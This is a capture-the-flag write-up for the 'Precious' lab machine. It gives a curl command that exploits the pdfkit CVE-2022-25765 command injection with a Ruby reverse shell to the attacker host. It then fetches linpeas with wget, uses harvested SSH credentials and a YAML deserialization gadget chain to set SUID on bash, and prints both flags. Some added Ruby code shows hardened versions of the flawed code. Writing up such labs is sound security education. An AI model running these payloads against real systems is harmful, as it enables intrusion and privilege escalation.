# Precious

<figure><img src="/files/Od8p3OGLDyd4nvsjQSNF" alt=""><figcaption></figcaption></figure>

## TARGET IP: 10.10.11.189

## HOST IP: 10.10.16.10

## Recon

### NMAP

```
nmap [Target IP]
```

<figure><img src="/files/HEALLkWjcUsgRQZGTjcK" alt=""><figcaption></figcaption></figure>

```
nmap -A -p 22,80 [Target IP]
```

<figure><img src="/files/JGZxX9lugB1zbmb8wYOq" alt=""><figcaption></figcaption></figure>

### HTTP

* First, map the hostname to the target IP address by adding it to the hosts file.

```
echo "[TARGET IP] precious.htb" | sudo tee -a /etc/hosts
```

<figure><img src="/files/0xzXygDg5xtcKeR7pMt0" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9gSm4Qnl9m7dUDg9JTtR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0m1NyF5obM6rTVx5USPn" alt=""><figcaption></figcaption></figure>

* I tried adding a URL to see what happens, but it looks like it does not have web access to view the page.

<figure><img src="/files/ODjrnnSM8V7xlAk8G45m" alt=""><figcaption></figcaption></figure>

* I tried <http://precious.htb/> and that still didn't work.
* ![](/files/cKxFjgESrjGoz16GxjVY)
* It does look like it will return credentials back depending on what you put in.

## Enumeration

### Gobuster

```
gobuster dir -u http://precious.htb/ -w /usr/share/dirb/wordlists/common.txt
```

<figure><img src="/files/UxW1UwS92MzHN8W3U16E" alt=""><figcaption></figcaption></figure>

## Exploit

* It looks like none of my notes from last night got saved for some stupid fucking reason. I need to learn how to better use this fucking site or this is going to drive me fucking nuts.
* Long story short, I created payloads with different file extensions. It seems like the machine filters out `.php` and `.rb` file extensions and will make a PDF file of any other file type I load into it.
* I did this by starting a Python web server on my host machine, plugging the URL into the input box on the web application, and opening a netcat listener to see if I could get something to stick.
* I'm still not positive on the backend code being used but am making the assumption that it is either php or ruby.

#### JAVA

* I started trying out java reverse shells and got something interesting when I used a java one liner with the file extension `.xml`.

![](/files/buU1S8J8XT5XNe3YG8IN)

#### PDF

* I finally downloaded one of the pdfs that I created and opened it in exiftool to take a look at the properties.

```
exiftool [PDF File Path]
```

<figure><img src="/files/IqG3wMBjbBm57KZDfw1X" alt=""><figcaption></figcaption></figure>

* It looks like the Creator's name is `pdfkit V0.8.6`
* Let's go take a look at how I can possibly exploit this.

### CVE-2022-25765

* Looks like this tool has a vulnerability that allows for Command Injection. Let's see if we can exploit this.
* Set up a netcat listener

```
nc -lvnp 4444
```

* I found a tool on [`Github`](https://github.com/shamo0/PDFkit-CMD-Injection) that uses a curl command and forms a reverse shell that exploits the vulnerability.

{% code overflow="wrap" %}

```
curl '[TARGET URL]' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: [TARGET URL]' -H 'Connection: keep-alive' -H 'Referer: [TARGET URL]' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F[HOST IP]%3A[HOST PORT]%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22[HOST IP]%22%2C[HOST PORT]%29%29%27%60'
```

{% endcode %}

* The data being sent is a URL-encoded Ruby reverse shell that connects back to the netcat listener I have set up.

<figure><img src="/files/RPJDteyb9MYlQ2HAPEH2" alt=""><figcaption></figcaption></figure>
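To show the bug class behind CVE-2022-25765 from the defender's side, here is an added example (not pdfkit's code and not part of the original notes) that puts the shell-string pattern that makes a URL injectable next to an array-argv build that never hands the URL to a shell; the wkhtmltopdf path and the sample URLs are constructed for illustration.

```ruby
require "uri"

WKHTMLTOPDF = "/usr/bin/wkhtmltopdf" # assumed binary path

# Constructed inputs (not from the box): a normal page, a URL carrying a backtick
# command in its query like the CVE-2022-25765 payload, and a $(...) variant.
GOOD_URL  = "http://example.test/report?id=42"
TICK_URL  = "http://example.test/?name=%20`id`"
SUBST_URL = "http://example.test/?name=%20$(id)"

# The vulnerable pattern: the caller's URL is interpolated into one shell command
# string. Whatever /bin/sh finds in it (backticks, $( ), ;) runs before
# wkhtmltopdf ever sees the URL. Returned here for inspection, never executed.
def vulnerable_command(url)
  "#{WKHTMLTOPDF} --quiet #{url} -"
end

# Characters RFC 3986 allows in a URL. Note that $ ( ) are legal here, so character
# filtering alone cannot stop $(...) injection; it only enforces URL syntax.
URL_CHARS = %r{\A[A-Za-z0-9\-._~:/?\#\[\]@!$&'()*+,;=%]+\z}

# Layer 1: accept only an absolute http(s) URL with a host (rejects file://,
# javascript: and relative paths, which would let the renderer read local files).
def checked_url(input)
  s = input.to_s
  return nil unless s.match?(URL_CHARS)
  uri = URI.parse(s)
  return nil unless uri.is_a?(URI::HTTP) && !uri.host.to_s.empty?
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# Layer 2, the one that actually closes the injection: build argv as an array and
# hand it to IO.popen(argv) / Open3.capture2(*argv), so no shell parses the URL.
def hardened_command(url)
  checked = checked_url(url)
  raise ArgumentError, "refusing to render #{url.inspect}" unless checked
  [WKHTMLTOPDF, "--quiet", checked, "-"]
end
```

The `$(id)` case passes the syntax check because every character in it is a legal URL character; it is harmless only because the argv form never lets a shell interpret it.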

* Let's get a more interactive shell to work with.

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^Z
```

* On the host machine, set the terminal to raw mode without echo and bring the shell back to the foreground.

```
stty raw -echo; fg
```

![](/files/v2415qpUNAiUTxeSvKwu)

* Let's go look for the user flag.

```
find / -name user.txt 2>/dev/null
```

![](/files/uAEgwENpKKGZjUdscKs8)

* Looks like the file is unreadable due to permissions. Let's see what we can do about that.
* I now know we have at least 3 users on the system:
  * henry
  * ruby
  * root
* We can confirm this in the `/etc/passwd` file.

![](/files/V6n5K2sVzJJNrNJ3FCT7)

* I tried `sudo -l` but needed a password to use it. I also spent some time digging around to try to find some other useful information. In the end, I went ahead and uploaded linpeas and ran that to see what was available.
* I used the same python web server I already had running.

```
wget http://[HOST IP]:8000/linpeas.sh
./linpeas.sh
```

![](/files/W0GMXfzbr96Y4bObPXd8)

* I wasn't getting anywhere there, so I started browsing around a bit more. In the file `/home/ruby/.bundle/config` I found some juicy info.

![](/files/wKUFgQLO0g8sGuKBkxiR)

* Looks like possible credentials for henry.

```
henry:Q3c1AqGHtoI0aXAYFH
```

* I'll now SSH into the machine with henry's credentials and it works.

```
ssh henry@[Target IP]
```

![](/files/mipHTccQKP0fHJUwAdfN)

* Now let's get that user file.

![](/files/8PgWdXMb0JiebqMhANlI)

```
0d534cd692f6860abfeb9af4ba3c4e92
```

* Next step is to see what privileges I have as Henry.

```
sudo -l
```

![](/files/9lpzT24mPaZfHvbmdadQ)

* We have sudo privileges to run `/usr/bin/ruby /opt/update_dependencies.rb`. If we cat that file we can see that it reads a `dependencies.yml` file.

![](/files/sgJuF4QaF9UBgvwfaxS1)

```
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

# Relative path: resolved against the caller's current directory, even under sudo.
# YAML.load (Psych < 4) instantiates any !ruby/object tag found in the file.
def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end
```
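For contrast, here is an added example (my own code, not from the box or the original notes) of how the `list_from_file` loader above would look once hardened: `YAML.safe_load` refuses `!ruby/object` tags, the file path is pinned to the script's own directory rather than the caller's working directory, and the result is checked to be a plain name-to-version mapping. The function names and the two sample documents are constructed for this illustration.

```ruby
require "yaml"

# Constructed sample documents (not files taken from the box): a plain name => version
# mapping, and a document carrying a !ruby/object tag like the privilege-escalation payload.
BENIGN_YAML = "---\nrake: \"13.0.6\"\npdfkit: \"0.8.6\"\n"
TAGGED_YAML = "---\n- !ruby/object:Gem::Installer\n    i: x\n"

# Hardened replacement for list_from_file (assumed names safe_parse_dependencies /
# safe_list_from_file). YAML.safe_load only builds core types (Hash, Array, String,
# Integer, ...) and raises Psych::DisallowedClass on any !ruby/object tag, so the
# gadget chain is never instantiated. Ruby 3.1+ (Psych 4) makes YAML.load behave
# this way by default; on an older Ruby, YAML.load is still the unsafe loader.
def safe_parse_dependencies(text)
  data = YAML.safe_load(text, permitted_classes: [], aliases: false)
  raise ArgumentError, "expected a name => version mapping" unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && version.is_a?(String)
      raise ArgumentError, "bad entry for #{name.inspect}"
    end
  end
  data
end

# Resolve the file next to the script (__dir__), not in the caller's working
# directory, so running the script with sudo from /home/henry cannot pick up a
# file the unprivileged user wrote there.
def safe_list_from_file(path = File.expand_path("dependencies.yml", __dir__))
  safe_parse_dependencies(File.read(path))
end

# Wraps the parser for inspection: [:ok, mapping] or [:rejected, exception class name].
def classify(text)
  [:ok, safe_parse_dependencies(text)]
rescue Psych::DisallowedClass, Psych::BadAlias, ArgumentError => e
  [:rejected, e.class.name]
end
```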

* Since the script loads `dependencies.yml` from the current working directory with `YAML.load`, we should be able to craft a malicious `dependencies.yml` that it will deserialize as root via sudo.
* In the `/home/henry` directory we will create a new `dependencies.yml` file and use this code snippet I got [online](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/).

```
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve
```

* You'll notice that `git_set` is set to `chmod +s /bin/bash`.
* This sets the SUID bit on that file, which means we should be able to use it to escalate our privileges.
* In the same directory that you created the `dependencies.yml` file, run the following:

```
sudo /usr/bin/ruby /opt/update_dependencies.rb
```

* This will execute the file and end up changing the `/bin/bash` file permissions.
* After this is done, we can use a privilege escalation technique from [GTFOBins](https://gtfobins.github.io/gtfobins/bash/#suid) to escalate our privileges.

```
/bin/bash -p
```

* Check who you are with `whoami` and you should now be root.

![](/files/CmD0hBJyLAoZrlMqBiF2)

```
cat /root/root.txt
```

![](/files/AHhudhThlxhdRMDeJWMq)

```
7090f28f7bc0ffc0a8b3203bd45ff6ac
```
